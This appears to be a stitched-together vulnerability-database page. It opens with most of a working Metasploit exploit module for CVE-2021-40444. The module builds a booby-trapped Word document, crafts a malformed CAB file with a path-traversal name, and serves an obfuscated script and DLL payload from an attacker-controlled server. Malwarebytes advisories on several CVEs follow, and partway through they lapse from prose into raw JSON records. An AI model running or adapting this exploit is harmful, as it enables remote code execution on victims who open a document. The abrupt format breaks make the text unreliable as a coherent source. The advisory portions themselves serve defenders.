          ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],
          ['URL', 'https://github.com/klezVirus/CVE-2021-40444']
        ],
        'Author' => [
          'lockedbyte ', # Vulnerability discovery.
          'klezVirus ', # References and PoC.
          'thesunRider', # Official Metasploit module.
          'mekhalleh (RAMELLA Sébastien)' # Zeop-CyberSecurity - code base contribution and refactoring.
        ],
        'DisclosureDate' => '2021-09-23',
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Platform' => 'win',
        'Arch' => [ARCH_X64],
        'Payload' => {
          'DisableNops' => true
        },
        'DefaultOptions' => {
          'FILENAME' => 'msf.docx'
        },
        'Targets' => [
          [
            'Hosted', {}
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [UNRELIABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
    ])
    register_advanced_options([
      OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),
    ])
  end

  def bin_to_hex(bstr)
    return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)
  end

  # MS-CAB checksum: XOR of 4-byte groups, with the 1-3 trailing bytes folded in
  # after a byte reversal so the result matches the specification's dword order.
  def cab_checksum(data, seed = "\x00\x00\x00\x00")
    checksum = seed

    bytes = ''
    data.chars.each_slice(4).map(&:join).each do |dword|
      if dword.length == 4
        checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')
      else
        bytes = dword
      end
    end
    checksum = checksum.reverse

    case (data.length % 4)
    when 3
      dword = "\x00#{bytes}"
    when 2
      dword = "\x00\x00#{bytes}"
    when 1
      dword = "\x00\x00\x00#{bytes}"
    else
      dword = "\x00\x00\x00\x00"
    end

    checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse
  end

  # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf
  def create_cab(data)
    cab_cfdata = ''
    filename = "../#{File.basename(@my_resources.first)}.inf"
    block_size = 32768
    struct_cffile = 0xd
    struct_cfheader = 0x30

    block_counter = 0
    data.chars.each_slice(block_size).map(&:join).each do |block|
      block_counter += 1

      seed = "#{[block.length].pack('S')}#{[block.length].pack('S')}"
      csum = cab_checksum(block, seed)

      vprint_status("Data block added w/ checksum: #{bin_to_hex(csum)}")
      cab_cfdata << csum # uint32 {4} - Checksum
      cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length
      cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length
      cab_cfdata << block
    end

    cab_size = [
      struct_cfheader +
      struct_cffile +
      filename.length +
      cab_cfdata.length
    ].pack('L<')

    # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)
    cab_header = "\x4D\x53\x43\x46" # uint32 {4} - Header (MSCF)
    cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)
    cab_header << cab_size # uint32 {4} - Archive Length
    cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)

    cab_header << "\x2C\x00\x00\x00" # uint32 {4} - Offset to the first CFFILE
    cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)
    cab_header << "\x03" # byte {1} - Minor Version (3)
    cab_header << "\x01" # byte {1} - Major Version (1)
    cab_header << "\x01\x00" # uint16 {2} - Number of Folders
    cab_header << "\x01\x00" # uint16 {2} - Number of Files
    cab_header << "\x00\x00" # uint16 {2} - Flags

    cab_header << "\xD2\x04" # uint16 {2} - Cabinet Set ID Number
    cab_header << "\x00\x00" # uint16 {2} - Sequential Number of this Cabinet file in a Set

    # CFFOLDER
    cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder
      struct_cfheader +
      struct_cffile +
      filename.length
    ].pack('L<')
    cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder
    cab_header << "\x00\x00" # uint16 {2} - Compression Format for each CFDATA in this Folder (0 = none, 1 = MSZIP)

    # increase file size to trigger vulnerability
    # (this dword is CFFILE.cbFile, the first field of the CFFILE record that follows the CFFOLDER)
    cab_header << [ # uint32 {4} - Uncompressed File Length ("\x02\x00\x5C\x41")
      data.length + 1073741824
    ].pack('L<')

    # set current date and time in the format of cab file
    date_time = Time.new
    date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')
    time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')

    # CFFILE
    cab_header << "\x00\x00\x00\x00" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)
    cab_header << "\x00\x00" # uint16 {2} - Folder ID (starts at 0)
    cab_header << date # uint16 {2} - File Date (\x5A\x53)
    cab_header << time # uint16 {2} - File Time (\xC3\x5C)
    cab_header << "\x20\x00" # uint16 {2} - File Attributes
    cab_header << filename # byte {X} - Filename (ASCII)
    cab_header << "\x00" # byte {1} - null Filename Terminator

    cab_stream = cab_header

    # CFDATA
    cab_stream << cab_cfdata
  end

  def generate_html
    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"
    inf = "#{File.basename(@my_resources.first)}.inf"

    file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')
    js_content = ::File.binread(file_path)

    js_content.gsub!('REPLACE_INF', inf)
    js_content.gsub!('REPLACE_URI', uri)
    if datastore['OBFUSCATE']
      print_status('Obfuscate JavaScript content')

      js_content = Rex::Exploitation::JSObfu.new js_content
      js_content = js_content.obfuscate(memory_sensitive: false)
    end

    html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'
    html += js_content.to_s
    html += '</script></body></html>'
    html
  end

  def get_file_in_docx(fname)
    i = @docx.find_index { |item| item[:fname] == fname }

    unless i
      fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
    end

    @docx.fetch(i)[:data]
  end

  def get_template_path
    datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')
  end

  def inject_docx
    document_xml = get_file_in_docx('word/document.xml')
    unless document_xml
      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')
    end

    document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')
    unless document_xml_rels
      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
    end

    # The relationship target uses the mhtml:...!x-usc: form so Word fetches the hosted HTML through MSHTML.
    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
    @docx.each do |entry|
      case entry[:fname]
      when 'word/document.xml'
        entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)
      when 'word/_rels/document.xml.rels'
        entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "mhtml:#{uri}!x-usc:#{uri}")
      end
    end
  end

  def normalize_uri(*strs)
    new_str = strs * '/'

    new_str = new_str.gsub!('//', '/') while new_str.index('//')

    # makes sure there's a starting slash
    unless new_str[0, 1] == '/'
      new_str = '/' + new_str
    end

    new_str
  end

  def on_request_uri(cli, request)
    header_cab = {
      'Access-Control-Allow-Origin' => '*',
      'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',
      'Cache-Control' => 'no-store, no-cache, must-revalidate',
      'Content-Type' => 'application/octet-stream',
      'Content-Disposition' => "attachment; filename=#{File.basename(@my_resources.first)}.cab"
    }

    header_html = {
      'Access-Control-Allow-Origin' => '*',
      'Access-Control-Allow-Methods' => 'GET, POST',
      'Cache-Control' => 'no-store, no-cache, must-revalidate',
      'Content-Type' => 'text/html; charset=UTF-8'
    }

    if request.method.eql? 'HEAD'
      if request.raw_uri.to_s.end_with? '.cab'
        send_response(cli, '', header_cab)
      else
        send_response(cli, '', header_html)
      end
    elsif request.method.eql? 'OPTIONS'
      response = create_response(501, 'Unsupported Method')
      response['Content-Type'] = 'text/html'
      response.body = ''

      cli.send_response(response)
    elsif request.raw_uri.to_s.end_with? '.html'
      print_status('Sending HTML Payload')

      send_response_html(cli, generate_html, header_html)
    elsif request.raw_uri.to_s.end_with? '.cab'
      print_status('Sending CAB Payload')

      send_response(cli, create_cab(@dll_payload), header_cab)
    end
  end

  def pack_docx
    @docx.each do |entry|
      if entry[:data].is_a?(Nokogiri::XML::Document)
        entry[:data] = entry[:data].to_s
      end
    end

    Msf::Util::EXE.to_zip(@docx)
  end

  def unpack_docx(template_path)
    document = []

    Zip::File.open(template_path) do |entries|
      entries.each do |entry|
        if entry.name.match(/\.xml|\.rels$/i)
          content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?
        elsif entry.file?
          content = entry.get_input_stream.read
        end

        vprint_status("Parsing item from template: #{entry.name}")

        document << { fname: entry.name, data: content }
      end
    end

    document
  end

  def primer
    print_status('CVE-2021-40444: Generate a malicious docx file')

    @proto = (datastore['SSL'] ? 'https' : 'http')
    if datastore['SRVHOST'] == '0.0.0.0'
      datastore['SRVHOST'] = Rex::Socket.source_address
    end

    template_path = get_template_path
    unless File.extname(template_path).match(/\.docx$/i)
      fail_with(Failure::BadConfig, 'Template is not a docx file!')
    end

    print_status("Using template '#{template_path}'")
    @docx = unpack_docx(template_path)

    print_status('Injecting payload in docx document')
    inject_docx

    print_status("Finalizing docx '#{datastore['FILENAME']}'")
    file_create(pack_docx)

    @dll_payload = Msf::Util::EXE.to_win64pe_dll(
      framework,
      payload.encoded,
      {
        arch: payload.arch.first,
        mixed_mode: true,
        platform: 'win'
      }
    )
  end
end
```

Source: <https://0day.today/exploit/37126> (CVSS v2 6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P).

## Malwarebytes Labs (entry last seen 2022-02-10)

If you’re running Windows 10, it’s time to stop delaying those patches and bring your systems up to date as soon as possible.

Bleeping Computer
[reports](<https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/>) that a researcher has come up with a bypass for an older bug, which could serve up some major headaches if left to fester. Those headaches will take the form of unauthorised admin privileges in Windows 10, alongside creating new admin accounts and more besides.

## What happened the first time round?

Back in 2021, Microsoft patched an exploit which had [been in use](<https://www.bleepingcomputer.com/news/security/recently-fixed-windows-zero-day-actively-exploited-since-mid-2020/>) since mid-2020. Classed as “high-severity”, “CVE-2021-1732 - Windows Win32k Elevation of Privilege Vulnerability” allowed attackers to elevate privileges to admin level.

Fooling potential victims by having them open bogus email attachments is all it would take to get one foot in the door via code execution. It popped up in a [targeted attack](<https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) related to the [Bitter APT](<https://www.forbes.com/sites/thomasbrewster/2021/09/17/exodus-american-tech-helped-india-spy-on-china>) campaign. According to the report, numbers were “very limited” and struck victims in China.

## What’s happening now?

Multiple exploits have dropped for another elevation of privilege vulnerability known as [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>). This is a bypass for the previously mentioned [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), which was fixed back in February 2021. CVE-2022-21882 was fixed by Microsoft via updates from January 2022. However, sysadmins out there may well have skipped the updates due to [various bugs](<https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/>) which came along for the update ride.

## Time to get fixing things?

It is absolutely time to get fixing things. The exploit is now out there in the wild, and as Bleeping Computer notes, it “affects all supported versions of Windows 10 before the January 2022 Patch Tuesday updates”.

Writers at Bleeping Computer were able to get it to work in testing, and others have confirmed it for themselves:

> Interestingly, #MDE detects this PoC as CVE-2021-1732.
> This is understandable since this #CVE-2022-21882 is a bypass of #CVE-2021-1732.
> Generic #LPE detection #KQL query works in this case too. #BlueTeam #ThreatHunting <https://t.co/01El9wPjk0>
> /1 <https://t.co/vM2apKJsI6>
>
> -- Bhabesh (@bh4b3sh) [January 29, 2022](<https://twitter.com/bh4b3sh/status/1487449316117516288?ref_src=twsrc%5Etfw>)

## Is there any reason to wait for February’s Patch Tuesday?

If you’re one of the hold-outs who ran into errors last time around, waiting isn’t advisable. Microsoft already issued an [OOB (out of band) update](<https://www.theverge.com/2022/1/18/22889670/microsoft-windows-server-update-vpn-refs-domain-patch>) to address the multiple errors caused by the January patch. As per Microsoft’s January 17th [notification about the release](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2777>):

> "Microsoft is releasing Out-of-band (OOB) updates today, January 17, 2022, for some versions of Windows. This update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount."

Things being what they are, it’s likely time to get in there and apply the OOB update (if you haven’t already) and put this one to rest.

Microsoft is putting a fair bit of work into figuring out where weak points lie in the patching process, making use of its Update Connectivity data. The [current estimate](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/achieve-better-patch-compliance-with-update-connectivity-data/ba-p/3073356>) is that a device needs a minimum of two continuous connected hours, and six total connected hours after an update is released, to reliably make it through the updating process.

If this sounds like your network, and if you’re still waiting to take the plunge, you’ve hopefully got little to lose by making that big update splash as soon as you possibly can.

The post [Apply those updates now: CVE bypass offers up admin privileges for Windows 10](<https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

| Published | Modified | Type | CVEs | CVSS v3.1 | CVSS v2 | Entry id |
|---|---|---|---|---|---|---|
| 2022-02-01 | 2022-02-01 | malwarebytes (blog) | CVE-2021-1732, CVE-2022-21882 | 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | 7.2 HIGH (AV:L/AC:L/Au:N/C:C/I:C/A:C) | MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3 |

## Malwarebytes Labs (entry last seen 2022-03-07)

There are many reasons why we want a bug fixed as soon as we can, but there are also plenty of reasons why doing it “right now” is not an option. This phenomenon starts at the side of the developers. The average time to fix a bug seems to vary depending on the platform the bug was found in. What is one group doing better, and can the others take lessons from that? Or is it something we have to take as it comes?

"Bug-fixing time" refers to the time required to fix known bugs. So, on a per-bug basis, it is the time between being made aware of an existing bug and issuing a fix for the bug.
The ability to better understand and predict bug-fixing time can help a project team better estimate software maintenance efforts and better manage software projects.\n\n## Reasons to fix ASAP\n\nThere are some very obvious reasons why we want to push and install bug fixes as soon as possible.\n\n * Improved security by fixing the vulnerability.\n * Even if a vulnerability is found by a researcher taking the high road of responsible disclosure, once the cat is out of the bag, there is a good chance others will be able to duplicate the researcher's effort. This could result in a zero-day vulnerability.\n * When you are working on a new version, a critical bug in the old version is holding you back as long as you don\u2019t know how to fix it.\n * If the published timeline shows it has taken months to fix a bug, it reflects badly on your company, and could lead customers to question whether you care about security.\n\nIn general, you can say that the bug-fixing time is an important factor for bug-related analysis, such as measuring software quality. Having your software considered to be \u201cbuggy\u201d does not help sales in any way. But situations may arise when you need to prioritize what needs to be fixed first.\n\n## Differences in platform\n\nLast month, the Project Zero team at Google looked at fixed bugs that were reported between January 2019 and December 2021. 
During this period, Project Zero reported 376 issues to vendors under their standard 90-day deadline.\n\nWhen [reading the data](<https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html>), it is important to note that the number of issues is too small and not chosen randomly enough to give a full picture, but it gives you an idea at least.\n\nVendor| Total bugs| Fixed by day 90| Fixed during grace period| Exceeded deadline and grace period| Avg days to fix \n---|---|---|---|---|--- \nApple| 84| 73 (87%)| 7 (8%)| 4 (5%)| 69 \nMicrosoft| 80| 61 (76%)| 15 (19%)| 4 (5%)| 83 \nGoogle| 56| 53 (95%)| 2 (4%)| 1 (2%)| 44 \nLinux| 25| 24 (96%)| 0 (0%)| 1 (4%)| 25 \nAdobe| 19| 15 (79%)| 4 (21%)| 0 (0%)| 65 \nMozilla| 10| 9 (90%)| 1 (10%)| 0 (0%)| 46 \nSamsung| 10| 8 (80%)| 2 (20%)| 0 (0%)| 72 \n \nOverall, the data show that almost all of the big vendors here are coming in under 90 days, on average.\n\n## Complaints from bug bounty hunters\n\nAt this point it should be pointed out that bugs reported by the Project Zero team are reported to vendors directly and will be taken very seriously by the vendors.\n\nIndividual bounty hunters, however, have been complaining about getting their bugs accepted. For example, in January we saw [CVE-2022-22587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22587>), a vulnerability in Apple\u2019s IOMobileFrameBuffer, where a malicious app could execute random code with kernel privileges. This vulnerability ended up being a zero-day vulnerability that was exploited in the wild after one of them posted a Proof-of-Concept (PoC).\n\nMany researchers that don\u2019t want to report to vendors directly make use of the Zero-Day-Initiative (ZDI). 
The ZDI was created to encourage the reporting of zero-day vulnerabilities privately to the affected vendors by financially rewarding researchers, although there have been complaints from researchers that they didn\u2019t feel they were taken seriously by the ZDI.\n\n## The next step\n\nSo, yes, it's important to fix vulnerabilities ASAP, but why does it take so long sometimes before these fixes and patches get installed?\n\nAccording to recent podcast guest Jess Dodson, the problem of patching isn\u2019t just a problem of resources\u2014time, staffing, funding\u2014but also of mindset. For some organizations, refusing to patch almost brings with it a bizarre sense of pride, Dodson said.\n\nFinally, even if you are not a Federal Civilian Executive Branch (FCEB) agency that needs to follow the [Binding Operational Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list known as the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) can act as a good guideline for your patch management strategy. 
This catalog provides FCEB agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nThe post [The struggle to reduce bug-fixing time is real](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/the-struggle-to-reduce-bug-fixing-time-is-real/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-03-07T20:06:37", "type": "malwarebytes", "title": "The struggle to reduce bug-fixing time is real", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-07T20:06:37", "id": "MALWAREBYTES:0CEEA2EDED4A06AE416CB7875CCE1C94", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/the-struggle-to-reduce-bug-fixing-time-is-real/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-11T14:18:19", "description": "Apple has released a security fix for a zero-day vulnerability ([CVE-2022-22620](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22620>)) that it says "may have been actively exploited." According to the security update information provided by [Apple](<https://support.apple.com/en-us/HT213092>) the vulnerability exists in WebKit\u2014the HTML rendering engine component of its Safari browser\u2014and can be used by an attacker to create web content that may lead to arbitrary code execution.\n\nApple says it has addressed this vulnerability with improved memory management in iOS 15.3.1, iPadOS 15.3.1, macOS Monterey 12.2.1, and Safari 15.3.\n\n### Vulnerability\n\nThe vulnerability is a use-after-free (UAF) issue in WebKit that could lead to OS crashes and code execution on compromised devices. Use after free (UAF) is a type of vulnerability that results from the incorrect use of dynamic memory during a program\u2019s operation. 
If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.\n\nThis issue can be exploited when WebKit processes HTML content. The attacker can exploit this vulnerability by luring users to visit a specially crafted web page. Once the user opens the malicious web page, an attacker can remotely execute malicious code on the targeted system. The vulnerability has been reported publicly as being exploited in the wild and was reported by an anonymous researcher.\n\nWebKit is the browser engine that powers Safari on Macs as well as all browsers on iOS and iPadOS (browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux. \n\n### Affected devices\n\nUsers owning the following devices should install the update as soon as possible:\n\n * iOS 15.3.1 and iPadOS 15.3.1 can be found on iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n * macOS Monterey 12.2.1 for all systems running macOS Monterey (MacBooks, iMacs, Mac minis, and Mac Pros)\n * All devices running macOS Big Sur and macOS Catalina which are using Safari.\n\nStay safe, everyone!\n\nThe post [Update now! Apple fixes actively exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-02-11T11:27:06", "type": "malwarebytes", "title": "Update now! 
Apple fixes actively exploited zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T11:27:06", "id": "MALWAREBYTES:180975C3E3516E431BF7664666327048", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country's defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing as its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. 
And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn't long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. 
Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\nStay safe, everyone!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence by conducting an incident response investigation. Atlassian rates the severity level of this vulnerability as critical.\n\nAtlassian has issued a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and is working on a fix for the affected products. This qualifies the vulnerability as a zero-day that is actively exploited in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). 
This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with the content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. 
However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web shell only served as a means of secondary access.\n\nOn further investigation they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process as well as the child processes created by the exploit were all running as the root user and group (with full privileges). These types of vulnerabilities are dangerous, as they allow attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. 
BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** is the first part of a parameter substitution in a shell script_\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. And according to Atlassian it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: if you access your Confluence site via an atlassian.net domain. This means it is hosted by Atlassian and is not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). 
